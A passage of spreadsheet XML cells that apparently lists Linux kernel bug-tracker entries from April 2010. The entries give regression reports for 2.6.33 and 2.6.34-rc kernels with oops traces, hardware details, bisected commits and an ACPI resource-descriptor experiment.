    <t>iwlagn makes my t500 misserable ever since early .34 Johill made me run with debug=0x802, output in attachment. the GPF splat also here: [19442.770407] general protection fault: 0000 [#1] SMP [19442.770415] last sysfs file: /sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/device:00/PNP0C09:00/PNP0C0A:00/power_supply/BAT0/energy_full [19442.770422] CPU 0 [19442.770426] Modules linked in: nfs lockd nfs_acl auth_rpcgss sunrpc cryptd aes_x86_64 aes_generic rfcomm binfmt_misc sco bridge stp ppdev bnep l2cap snd_hda_codec_ conexant joydev fbcon tileblit font bitblit softcursor kvm_intel autofs4 kvm arc4 snd_hda_intel snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi pcmcia snd_rawmidi snd_seq_midi_event iwlagn snd_seq thinkpad_acpi iwlcore snd_timer i915 snd_seq_device drm_kms_helper mac80211 drm yenta_socket sdhci_pci sdhci psmouse btusb rsrc_nonstatic i2c_algo_bit bluetooth nvram snd serio_raw led_class pcmcia_core video cfg80211 soundcore snd_page_alloc output lp intel_agp parport xfs exportfs ohci1394 ieee1394 ahci e1000e [19442.770555] [19442.770563] Pid: 863, comm: iwlagn Not tainted 2.6.34-rc3-tip+ #5 2242CTO/2242CTO [19442.770569] RIP: 0010:[&lt;ffffffff812a4d20&gt;] [&lt;ffffffff812a4d20&gt;] memcpy+0x10/0xb0 [19442.770584] RSP: 0018:ffff880135215cf8 EFLAGS: 00010202 [19442.770590] RAX: ffff880130628316 RBX: ffff8801354c97a0 RCX: 0000000000000001 [19442.770596] RDX: 0000000000000001 RSI: 000c0199000020de RDI: ffff880130628316 [19442.770602] RBP: ffff880135215d10 R08: 00000000000000ea R09: 00000000ffffffff [19442.770608] R10: 000000000a6a2100 R11: 00000000000000c8 R12: ffff8801354c1360 [19442.770614] R13: ffff8801354c1db8 R14: 0000000000000070 R15: ffff880130628000 [19442.770621] FS: 0000000000000000(0000) GS:ffff880001e00000(0000) knlGS:0000000000000000 [19442.770628] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [19442.770634] CR2: 00007ffc65782a18 CR3: 0000000001a29000 CR4: 00000000000006f0 [19442.770640] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [19442.770646] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [19442.770653] Process iwlagn (pid: 863, threadinfo ffff880135214000, task ffff880134008000) [19442.770658] Stack: [19442.770662] ffffffffa0370e21 ffffffffa037eec0 0000000000000001 ffff880135215e30 [19442.770671] &lt;0&gt; ffffffffa0371acf ffffe8ff0000000a ffff880135215fd8 ffff880135215d70 [19442.770682] &lt;0&gt; ffffffffa035c32b ffff880135215d50 ffffffff02800000 ffff880100000055 [19442.770693] Call Trace: [19442.770727] [&lt;ffffffffa0370e21&gt;] ? iwl_fill_probe_req+0x81/0xb0 [iwlcore] [19442.770755] [&lt;ffffffffa0371acf&gt;] iwl_bg_request_scan+0x63f/0x1390 [iwlcore] [19442.770783] [&lt;ffffffffa035c32b&gt;] ? iwl_send_cmd_async+0x5b/0xe0 [iwlcore] [19442.770809] [&lt;ffffffffa035c3ea&gt;] ? iwl_send_cmd_pdu_async+0x3a/0x40 [iwlcore] [19442.770836] [&lt;ffffffffa035c3f0&gt;] ? iwl_generic_cmd_callback+0x0/0x150 [iwlcore] [19442.770858] [&lt;ffffffffa03f95b8&gt;] ? iwl5000_send_tx_power+0x58/0x60 [iwlagn] [19442.770884] [&lt;ffffffffa0351096&gt;] ? iwl_set_tx_power+0x96/0x160 [iwlcore] [19442.770910] [&lt;ffffffffa0371490&gt;] ? iwl_bg_request_scan+0x0/0x1390 [iwlcore] [19442.770921] [&lt;ffffffff810770dd&gt;] worker_thread+0x17d/0x2b0 [19442.770932] [&lt;ffffffff8107be70&gt;] ? autoremove_wake_function+0x0/0x40 [19442.770941] [&lt;ffffffff81076f60&gt;] ? worker_thread+0x0/0x2b0 [19442.770948] [&lt;ffffffff8107b936&gt;] kthread+0x96/0xa0 [19442.770957] [&lt;ffffffff8100ae24&gt;] kernel_thread_helper+0x4/0x10 [19442.770965] [&lt;ffffffff8107b8a0&gt;] ? kthread+0x0/0xa0 [19442.770972] [&lt;ffffffff8100ae20&gt;] ? kernel_thread_helper+0x0/0x10 [19442.770977] Code: c0 49 89 70 58 41 c6 40 4c 04 83 e0 fc 83 c0 08 41 88 40 4d c9 c3 90 90 90 90 90 48 89 f8 89 d1 c1 e9 03 83 e2 07 f3 48 a5 89 d1 &lt;f3&gt; a4 c3 8b 1e 4c 8b 46 08 4c 89 1f 4c 89 47 08 4c 8b 4e 10 4c [19442.771060] RIP [&lt;ffffffff812a4d20&gt;] memcpy+0x10/0xb0 [19442.771068] RSP &lt;ffff880135215cf8&gt; [19442.771084] ---[ end trace d26f7b1d5bd2cfb3 ]---</t>
  </si>
  <si>
    <t>start_kernel(): bug: interrupts were enabled early</t>
  </si>
  <si>
    <t>2010-04-01 16:31 UTC</t>
  </si>
  <si>
    <t>2010-04-21 05:02 UTC</t>
  </si>
  <si>
    <t>Subject : start_kernel(): bug: interrupts were enabled early Submitter : Rabin Vincent &lt;rabin@rab.in&gt; Date : 2010-03-25 19:53 Message-ID : 20100325194100.GA2364@debian References : http://marc.info/?l=linux-kernel&amp;m=126954607216519&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline. Caused by: commit 773e3eb7b81e5ba13b5155dfb3bb75b8ce37f8f9 Author: Yinghai Lu &lt;yinghai@kernel.org&gt; Date: Wed Feb 10 01:20:33 2010 -0800 init: Move radix_tree_init() early Prepare for using radix trees in early_irq_init(). Signed-off-by: Yinghai Lu &lt;yinghai@kernel.org&gt; LKML-Reference: &lt;1265793639-15071-30-git-send-email-yinghai@kernel.org&gt; Signed-off-by: H. Peter Anvin &lt;hpa@zytor.com&gt; First-Bad-Commit : 773e3eb7b81e5ba13b5155dfb3bb75b8ce37f8f9</t>
  </si>
  <si>
    <t>intel graphic card hanging (Hangcheck timer elapsed... GPU hung)</t>
  </si>
  <si>
    <t>2010-04-01 18:34 UTC</t>
  </si>
  <si>
    <t>2011-02-17 03:41 UTC</t>
  </si>
  <si>
    <t>Subject : intel graphic card hanging (Hangcheck timer elapsed... GPU hung) Submitter : Norbert Preining &lt;preining@logic.at&gt; Date : 2010-03-27 16:11 Message-ID : 20100327161104.GA12043@gamma.logic.tuwien.ac.at References : http://marc.info/?l=linux-kernel&amp;m=126970883105262&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.34-rc2: "ima_dec_counts: open/free imbalance"?</t>
  </si>
  <si>
    <t>2010-04-01 19:07 UTC</t>
  </si>
  <si>
    <t>2010-12-22 12:12 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.34-rc2: "ima_dec_counts: open/free imbalance"? Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; Date : 2010-03-28 11:31 Message-ID : 1269775909.5301.4.camel@localhost.localdomain References : http://marc.info/?l=linux-kernel&amp;m=126977593326800&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.34-rc2 NFS4 oops] open error path failure...</t>
  </si>
  <si>
    <t>2010-04-01 20:07 UTC</t>
  </si>
  <si>
    <t>2010-04-08 20:20 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.34-rc2 NFS4 oops] open error path failure... Submitter : Daniel J Blueman &lt;daniel.blueman@gmail.com&gt; Date : 2010-03-29 18:36 Message-ID : 6278d2221003291136p6481fe8emfb039403343c082@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=126988782722711&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.34-rc3 breaks headphone-output for ALC262</t>
  </si>
  <si>
    <t>2010-04-04 11:14 UTC</t>
  </si>
  <si>
    <t>2010-04-07 20:14 UTC</t>
  </si>
  <si>
    <t>With Linux 2.6.34-rc3 the headphone output on my Sony VPCW21Z1E stopped working: The builtin speakers still work and the headphone *detection* also works (mutes internal speakers), but there is no sound on the headphone jack. The PCM-Device is also missing in alsamixer. Reverting http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=patch;h=6a4f2ccb467e00281470cde2dee08fe5ecde62d1 brings the PCM-device back and headphone-out also works like it used to in 2.6.34-rc2 Hardware information: 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) Subsystem: Sony Corporation Device 9066 Flags: bus master, fast devsel, latency 0, IRQ 28 Memory at 56200000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Capabilities: [60] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [70] Express Root Complex Integrated Endpoint, MSI 00 Capabilities: [100] Virtual Channel &lt;?&gt; Capabilities: [130] Root Complex Link &lt;?&gt; Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel /proc/asound/..../codec#0 Codec: Realtek ALC262 Address: 0 Function Id: 0x1 Vendor Id: 0x10ec0262 Subsystem Id: 0x104d3e00 Revision Id: 0x100302 No Modem Function Group found</t>
  </si>
  <si>
    <t>Oopses in conjunction with wireless, ath9k</t>
  </si>
  <si>
    <t>2.6.32.11, 2.6.33.2</t>
  </si>
  <si>
    <t>2010-04-04 18:43 UTC</t>
  </si>
  <si>
    <t>2010-05-28 17:47 UTC</t>
  </si>
  <si>
    <t>Hello, I'm seeing what I think are oopses in my syslog. They appear since I update the kernel from 2.6.32.10 to .11 (that's my best guess anyway, never witnessed any of them with .10). I don't know if they're worth looking at. For one in the beginning it always shows "WARNING" (so not really an error I guess) and I can't really say that anything doesn't work after the oops occurs. I have the feeling that my wifi connections is lacking the stability I experienced during the rule of the previous minor stable version, but it's really mere subjective. But, I saw the oopses twice now, two days in a row. First one: wlan0: deauthenticated from 00:1a:2b:0d:ac:5e (Reason: 7) ------------[ cut here ]------------ WARNING: at kernel/softirq.c:143 local_bh_enable_ip+0x3c/0x8a() Hardware name: System Product Name Modules linked in: sha256_generic serpent cbc dm_crypt Pid: 49, comm: phy0 Not tainted 2.6.32.11 #1 Call Trace: [&lt;ffffffff810350eb&gt;] ? local_bh_enable_ip+0x3c/0x8a [&lt;ffffffff810350eb&gt;] ? local_bh_enable_ip+0x3c/0x8a [&lt;ffffffff81030b69&gt;] ? warn_slowpath_common+0x77/0xa3 [&lt;ffffffff810350eb&gt;] ? local_bh_enable_ip+0x3c/0x8a [&lt;ffffffff81215d04&gt;] ? ath_tx_node_cleanup+0x13c/0x15c [&lt;ffffffff812fd9f7&gt;] ? __sta_info_unlink+0x164/0x19e [&lt;ffffffff812fda59&gt;] ? sta_info_unlink+0x28/0x37 [&lt;ffffffff81302d40&gt;] ? ieee80211_set_disassoc+0x193/0x1e7 [&lt;ffffffff81302e0b&gt;] ? ieee80211_rx_mgmt_deauth+0x77/0xa8 [&lt;ffffffff81305184&gt;] ? ieee80211_sta_work+0x1ac/0xe84 [&lt;ffffffff81318208&gt;] ? thread_return+0x4e/0x10f [&lt;ffffffff810391e3&gt;] ? mod_timer+0x114/0x124 [&lt;ffffffff81304fd8&gt;] ? ieee80211_sta_work+0x0/0xe84 [&lt;ffffffff8103ef23&gt;] ? worker_thread+0xf5/0x179 [&lt;ffffffff81041f20&gt;] ? autoremove_wake_function+0x0/0x2e [&lt;ffffffff8103ee2e&gt;] ? worker_thread+0x0/0x179 [&lt;ffffffff81041cb1&gt;] ? kthread+0x79/0x81 [&lt;ffffffff8100bdfa&gt;] ? child_rip+0xa/0x20 [&lt;ffffffff81041c38&gt;] ? kthread+0x0/0x81 [&lt;ffffffff8100bdf0&gt;] ? child_rip+0x0/0x20 ---[ end trace 8b59f214aa8c10be ]--- wlan0: direct probe to AP 00:1a:2b:0d:ac:5e (try 1) wlan0: direct probe responded wlan0: authenticate with AP 00:1a:2b:0d:ac:5e (try 1) wlan0: authenticated wlan0: associate with AP 00:1a:2b:0d:ac:5e (try 1) wlan0: RX AssocResp from 00:1a:2b:0d:ac:5e (capab=0x11 status=0 aid=1) wlan0: associated Second: No probe response from AP 00:1a:2b:0d:ac:5e after 500ms, disconnecting. ------------[ cut here ]------------ WARNING: at kernel/softirq.c:143 local_bh_enable_ip+0x3c/0x8a() Hardware name: System Product Name Modules linked in: Pid: 49, comm: phy0 Not tainted 2.6.32.11 #3 Call Trace: [&lt;ffffffff810350eb&gt;] ? local_bh_enable_ip+0x3c/0x8a [&lt;ffffffff810350eb&gt;] ? local_bh_enable_ip+0x3c/0x8a [&lt;ffffffff81030b69&gt;] ? warn_slowpath_common+0x77/0xa3 [&lt;ffffffff810350eb&gt;] ? local_bh_enable_ip+0x3c/0x8a [&lt;ffffffff81215d04&gt;] ? ath_tx_node_cleanup+0x13c/0x15c [&lt;ffffffff812fd9f7&gt;] ? __sta_info_unlink+0x164/0x19e [&lt;ffffffff812fda59&gt;] ? sta_info_unlink+0x28/0x37 [&lt;ffffffff81302d40&gt;] ? ieee80211_set_disassoc+0x193/0x1e7 [&lt;ffffffff81318dd9&gt;] ? mutex_lock+0xd/0x31 [&lt;ffffffff81304fd8&gt;] ? ieee80211_sta_work+0x0/0xe84 [&lt;ffffffff813055a8&gt;] ? ieee80211_sta_work+0x5d0/0xe84 [&lt;ffffffff81318208&gt;] ? thread_return+0x4e/0x10f [&lt;ffffffff810391e3&gt;] ? mod_timer+0x114/0x124 [&lt;ffffffff81304fd8&gt;] ? ieee80211_sta_work+0x0/0xe84 [&lt;ffffffff8103ef23&gt;] ? worker_thread+0xf5/0x179 [&lt;ffffffff81041f20&gt;] ? autoremove_wake_function+0x0/0x2e [&lt;ffffffff8103ee2e&gt;] ? worker_thread+0x0/0x179 [&lt;ffffffff81041cb1&gt;] ? kthread+0x79/0x81 [&lt;ffffffff8100bdfa&gt;] ? child_rip+0xa/0x20 [&lt;ffffffff81041c38&gt;] ? kthread+0x0/0x81 [&lt;ffffffff8100bdf0&gt;] ? child_rip+0x0/0x20 ---[ end trace 3adfa5f3dbe1ecae ]--- wlan0: direct probe to AP 00:1a:2b:0d:ac:5e (try 1) Kind regards Sebastian</t>
  </si>
  <si>
    <t>calling pm-suspend freezes system</t>
  </si>
  <si>
    <t>2.6.34-rc3-7-pae (openSuSE 11.3 factory kernel)</t>
  </si>
  <si>
    <t>2010-04-05 05:13 UTC</t>
  </si>
  <si>
    <t>Werner Lemberg</t>
  </si>
  <si>
    <t>[Dell Inspiron 6400; Intel 945GM] The title says all. The graphics system is switched to the console, then everything freezes without a trace in any of the log files. This is the first kernel of the 2.6.34 series I'm able to boot. Running 2.6.33-26 this problem doesn't exist. Note that I *suspect* that it is a problem with the graphics driver (since usually pm-hibernate on 2.6.33 fails with similar symptoms). Please tell me how to improve this report, if possible or necessary.</t>
  </si>
  <si>
    <t>Freeze on power-off / suspend to ram</t>
  </si>
  <si>
    <t>2.6.34-rc3-7-pae</t>
  </si>
  <si>
    <t>2010-04-05 13:53 UTC</t>
  </si>
  <si>
    <t>arond</t>
  </si>
  <si>
    <t>2010-04-22 05:48 UTC</t>
  </si>
  <si>
    <t>Created attachment 25867 [details] output from acpidump Computer freezes right before it should turn off, either on normal shutdown or in suspend to ram. Cannot find any relevant information on any logs (hints?). Worked perfectly on previous versions (2.6.33 etc...). Im running openSUSE 11.1 Attaching acpidump. Please tell me what other info i should post. Thank you!</t>
  </si>
  <si>
    <t>rt2500usb driver cannot remain connected</t>
  </si>
  <si>
    <t>2.6.34-rc3-00191-gdb217de</t>
  </si>
  <si>
    <t>2010-04-05 19:30 UTC</t>
  </si>
  <si>
    <t>jcallen</t>
  </si>
  <si>
    <t>In 2.6.32 (and earlier), I was able to use the rt2500usb driver with my D-Link DWL-G122 wireless NIC (ID 2001:3c00 "D-Link Corp. [hex] DWL-G122 802.11g rev. B1 [ralink]"). Now, with 2.6.34-rc3-00191-gdb217de, once I get an IP address via dhcpcd, it immediately looses the connection, with the following message repeated in the syslog: phy0 -&gt; rt2500usb_set_device_state: Error - Device failed to enter state 3 (-16).</t>
  </si>
  <si>
    <t>Linux should ignore Producer/Consumer bit in _CRS Address Space descriptors</t>
  </si>
  <si>
    <t>2010-04-05 23:32 UTC</t>
  </si>
  <si>
    <t>2010-09-29 02:24 UTC</t>
  </si>
  <si>
    <t>In the ACPI PCI host bridge driver, the arch-specific code parses _CRS resources to learn the windows forwarded to the PCI bus. Both ia64 and x86 follow section 6.4.3.5 of ACPI spec 4.0, which says that Bit[0] of Byte 4 in QWord, DWord, Word, and Extended Address Space Descriptors is a "Consumer/Producer" bit. This bit is set if the device consumes the resource, and clear if the device produces and consumes it, i.e., if the device forwards the resource to a downstream bus. However, it is rumored that BIOSes have not used the Consumer/Producer bit consistently, and the bit was documented as "Ignored" in ACPI 2.0c. The bit was added back in 3.0, but this apparently was a mistake. I experimented with Windows Server 2008 R2 in a qemu environment, running SeaBIOS, where I could modify the _CRS description and see how Windows handled it. The PCI host bridge windows should be described as ResourceProducer, and the HPET registers should be described as ResourceConsumer. As shown here, I modified the SeaBIOS DSDT to reverse both flags, so the bridge window is a Consumer and the HPET registers are a Producer: Device(PCI0) { Name (_HID, EisaId ("PNP0A03")) Name (_CRS, ResourceTemplate () { ... DWordMemory (ResourceConsumer, PosDecode, MinFixed, MaxFixed, NonCacheable, ReadWrite, 0x00000000, // Address Space Granularity 0xE0000000, // Address Range Minimum 0xFEBFFFFF, // Address Range Maximum 0x00000000, // Address Translation Offset 0x1EC00000, // Address Length ,, , AddressRangeMemory, TypeStatic) }) } Device(HPET) { Name(_HID, EISAID("PNP0103")) Name(_CRS, ResourceTemplate() { DWordMemory( ResourceProducer, PosDecode, MinFixed, MaxFixed, NonCacheable, ReadWrite, 0x00000000, 0xFED00000, 0xFED003FF, 0x00000000, 0x00000400 /* 1K memory: FED00000 - FED003FF */ ) }) } The attachments of Windows Device Manager screenshots show that Windows interpreted the bridge ResourceConsumer as a window and the HPET ResourceProducer as normal registers. PCI devices, e.g., the NIC and VGA, inside the ResourceConsumer range worked normally.</t>
  </si>
  <si>
    <t>_REG evaluation required while no EC OperationRegion</t>
  </si>
  <si>
    <t>2.6.32.4</t>
  </si>
  <si>
    <t>2010-04-07 08:32 UTC</t>
  </si>
  <si>
    <t>leon7176@gmail.com</t>
  </si>
  <si>
    <t>2014-10-28 05:12 UTC</t>
  </si>
  <si>
    <t>19602 34532 42628 43156</t>
  </si>
  <si>
    <t>Created attachment 25888 [details] dmesg_acpi_parse_error Hardware Model (on what HW this bug is uncovered): Calpella platform Bug detailed descriptions(behavior, impact, etc) =========================================================== can not get the AC/DC status after system booting up. Reproduce Steps(steps,current result, reproduce possibility) =========================================================== (1)Booting up System (2)Check the power status and AC/DC status always show 0% (3)Check the dmesg and find ACPI Error as bellow ACPI Error (psargs-0359): [\_PR_.CPU0._PPC] Namespace lookup failure, AE_NOT_FOUND ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.ACAD._PSR] (Node f7457798), AE_NOT_FOUND ACPI Exception: AE_NOT_FOUND, Error reading AC Adapter state (20090903/ac-140) Expected result: =========================================================== The AC/DC status is relative to Power source. Possible root cause: =========================================================== It seems that the ACPI DSDT related or driver issue, but the AC/DC status is normal shown on Windows 7.</t>
  </si>
  <si>
    <t>[regression] 2.6.34-rc1 to -rc3 on zaurus: no longer boots</t>
  </si>
  <si>
    <t>2010-04-07 20:25 UTC</t>
  </si>
  <si>
    <t>2010-06-14 14:11 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] 2.6.34-rc1 to -rc3 on zaurus: no longer boots Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2010-04-01 6:06 Message-ID : 20100401060624.GA1329@ucw.cz References : http://marc.info/?l=linux-kernel&amp;m=127010200817402&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hackbench regression due to commit 9dfc6e68bfe6e</t>
  </si>
  <si>
    <t>2010-04-07 20:31 UTC</t>
  </si>
  <si>
    <t>2010-06-13 17:29 UTC</t>
  </si>
  <si>
    <t>Subject : hackbench regression due to commit 9dfc6e68bfe6e Submitter : Alex Shi &lt;alex.shi@intel.com&gt; Date : 2010-03-25 8:40 Message-ID : 1269506457.4513.141.camel@alexs-hp.sh.intel.com References : http://marc.info/?l=linux-kernel&amp;m=126950632920682&amp;w=4 Handled-By : Christoph Lameter &lt;cl@linux-foundation.org&gt; Handled-By : Pekka Enberg &lt;penberg@cs.helsinki.fi&gt; This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline. Caused by: commit 9dfc6e68bfe6ee452efb1a4e9ca26a9007f2b864 Author: Christoph Lameter &lt;cl@linux-foundation.org&gt; Date: Fri Dec 18 16:26:20 2009 -0600 SLUB: Use this_cpu operations in slub First-Bad-Commit : 9dfc6e68bfe6ee452efb1a4e9ca26a9007f2b864</t>
  </si>
  <si>
    <t>vmscan: underflow for get_scan_ratio</t>
  </si>
  <si>
    <t>2010-04-07 20:40 UTC</t>
  </si>
  <si>
    <t>2010-04-08 20:05 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH]vmscan: handle underflow for get_scan_ratio Submitter : Shaohua Li &lt;shaohua.li@intel.com&gt; Date : 2010-03-30 5:53 Message-ID : 20100330055304.GA2983@sli10-desk.sh.intel.com References : http://marc.info/?l=linux-kernel&amp;m=126992842105754&amp;w=4 Handled-By : KOSAKI Motohiro &lt;kosaki.motohiro@jp.fujitsu.com&gt; Handled-By : Wu Fengguang &lt;fengguang.wu@intel.com&gt; This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline. Caused by: commit 84b18490d1f1bc7ed5095c929f78bc002eb70f26 Author: KOSAKI Motohiro &lt;kosaki.motohiro@jp.fujitsu.com&gt; Date: Fri Mar 5 13:41:47 2010 -0800 vmscan: get_scan_ratio() cleanup Signed-off-by: KOSAKI Motohiro &lt;kosaki.motohiro@jp.fujitsu.com&gt; Reviewed-by: Rik van Riel &lt;riel@redhat.com&gt; Reviewed-by: KAMEZAWA Hiroyuki &lt;kamezawa.hiroyu@jp.fujitsu.com&gt; Reviewed-by: Minchan Kim &lt;minchan.kim@gmail.com&gt; Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt; Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt; First-Bad-Commit : 84b18490d1f1bc7ed5095c929f78bc002eb70f26</t>
  </si>
  <si>
    <t>File corruption regression on NFS related to commit 1f36f774</t>
  </si>
  <si>
    <t>2010-04-07 21:14 UTC</t>
  </si>
  <si>
    <t>2010-04-08 20:06 UTC</t>
  </si>
  <si>
    <t>Subject : [GIT BISECT] first bad commit: 1f36f774 Switch !O_CREAT case to use of do_last() Submitter : Boaz Harrosh &lt;bharrosh@panasas.com&gt; Date : 2010-03-24 15:49 Message-ID : 4BAA3493.1030802@panasas.com References : http://marc.info/?l=linux-kernel&amp;m=126944579810350&amp;w=4 Handled-By : Al Viro &lt;viro@zeniv.linux.org.uk&gt; This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline. Reportedly caused by: commit 1f36f774b22a0ceb7dd33eca626746c81a97b6a5 Author: Al Viro &lt;viro@zeniv.linux.org.uk&gt; Date: Sat Dec 26 10:56:19 2009 -0500 Switch !O_CREAT case to use of do_last() ... and now we have all intents crap well localized Signed-off-by: Al Viro &lt;viro@zeniv.linux.org.uk&gt; First-Bad-Commit : 1f36f774b22a0ceb7dd33eca626746c81a97b6a5</t>
  </si>
  <si>
    <t>virtio_net causing kernel BUG when running under VirtualBox</t>
  </si>
  <si>
    <t>2010-04-07 21:21 UTC</t>
  </si>
  <si>
    <t>2010-05-04 20:55 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in virtio_net causing kernel BUG when running under VirtualBox (bisected) Submitter : Thomas Müller &lt;thomas@mathtm.de&gt; Date : 2010-03-27 14:32 Message-ID : 4BAE1707.2050803@mathtm.de References : http://marc.info/?l=linux-kernel&amp;m=126970039227740&amp;w=4 Handled-By : Shirley Ma &lt;mashirle@us.ibm.com&gt; This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline. Caused by: commit 9ab86bbcf8be755256f0a5e994e0b38af6b4d399 Author: Shirley Ma &lt;mashirle@us.ibm.com&gt; Date: Fri Jan 29 03:20:04 2010 +0000 virtio_net: Defer skb allocation in receive path Signed-off-by: Shirley Ma &lt;xma@us.ibm.com&gt; Signed-off-by: Rusty Russell &lt;rusty@rustcorp.com.au&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; First-Bad-Commit : 9ab86bbcf8be755256f0a5e994e0b38af6b4d399</t>
  </si>
  <si>
    <t>2.6.34-rc3 doesn't suspend to disk (-rc2 did)</t>
  </si>
  <si>
    <t>2010-04-08 18:42 UTC</t>
  </si>
  <si>
    <t>2010-04-20 03:36 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.34-rc3 doesn't suspend to disk (-rc2 did) Submitter : Jiri Kosina &lt;jkosina@suse.cz&gt; Date : 2010-04-02 0:19 Message-ID : alpine.LNX.2.00.1004020215100.8345@pobox.suse.cz References : http://marc.info/?l=linux-kernel&amp;m=127016758131762&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: physmap modprobe &amp; rmmod</t>
  </si>
  <si>
    <t>2010-04-08 18:49 UTC</t>
  </si>
  <si>
    <t>2010-06-13 11:42 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: physmap modprobe &amp; rmmod Submitter : Randy Dunlap &lt;randy.dunlap@oracle.com&gt; Date : 2010-04-02 20:40 Message-ID : 20100402134058.c4682716.randy.dunlap@oracle.com References : http://marc.info/?l=linux-kernel&amp;m=127024096210230&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Ugly rmap NULL ptr deref oopsie on hibernate (was Linux 2.6.34-rc3)</t>
  </si>
  <si>
    <t>2010-04-08 19:10 UTC</t>
  </si>
  <si>
    <t>2010-04-21 05:08 UTC</t>
  </si>
  <si>
    <t>Subject : Ugly rmap NULL ptr deref oopsie on hibernate (was Linux 2.6.34-rc3) Submitter : Borislav Petkov &lt;bp@alien8.de&gt; Date : 2010-04-02 17:59 Message-ID : 20100402175937.GA19690@liondog.tnic References : http://marc.info/?l=linux-kernel&amp;m=127023173329741&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Crash when accessing nonexistent GTT entries in i915</t>
  </si>
  <si>
    <t>2010-04-08 22:17 UTC</t>
  </si>
  <si>
    <t>2010-09-08 20:46 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] intel-agp.c: Fix crash when accessing nonexistent GTT entries in i915 Submitter : Miguel Ojeda &lt;miguel.ojeda.sandonis@gmail.com&gt; Date : 2010-03-10 22:09 Message-ID : 1268258994.2183.14.camel@carter References : http://marc.info/?l=linux-kernel&amp;m=126825901326111&amp;w=4 Handled-By : Zhenyu Wang &lt;zhenyuw@linux.intel.com&gt; Handled-By : Andrew Morton &lt;akpm@linux-foundation.org&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Ooops when working with USB MIDI (2.6.33.1)</t>
  </si>
  <si>
    <t>2010-04-09 16:44 UTC</t>
  </si>
  <si>
    <t>2010-12-08 08:26 UTC</t>
  </si>
  <si>
    <t>Subject : Ooops when working with USB MIDI (2.6.33.1) Submitter : Tvrtko Ursulin &lt;tvrtko@ursulin.net&gt; Date : 2010-04-05 13:33 Message-ID : 201004051433.47171.tvrtko@ursulin.net References : http://marc.info/?l=linux-kernel&amp;m=127047505608660&amp;w=2 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.34-rc1 REGRESSION] ahci 0000:00:1f.2: controller reset failed (0xffffffff)</t>
  </si>
  <si>
    <t>2010-04-09 19:08 UTC</t>
  </si>
  <si>
    <t>2010-08-03 15:01 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.34-rc1 REGRESSION] ahci 0000:00:1f.2: controller reset failed (0xffffffff) Submitter : Andy Isaacson &lt;adi@hexapodia.org&gt; Date : 2010-04-06 22:54 Message-ID : 20100406225425.GA8292@hexapodia.org References : http://marc.info/?l=linux-kernel&amp;m=127059449031511&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>bisected 2.6.34-rc3+git EC regression - can't boot after fix from bug #14667</t>
  </si>
  <si>
    <t>2.6.34-rc3+git</t>
  </si>
  <si>
    <t>2010-04-10 12:06 UTC</t>
  </si>
  <si>
    <t>Ricardo Salveti de Araujo</t>
  </si>
  <si>
    <t>2010-05-24 21:42 UTC</t>
  </si>
  <si>
    <t>15759 15767 15773</t>
  </si>
  <si>
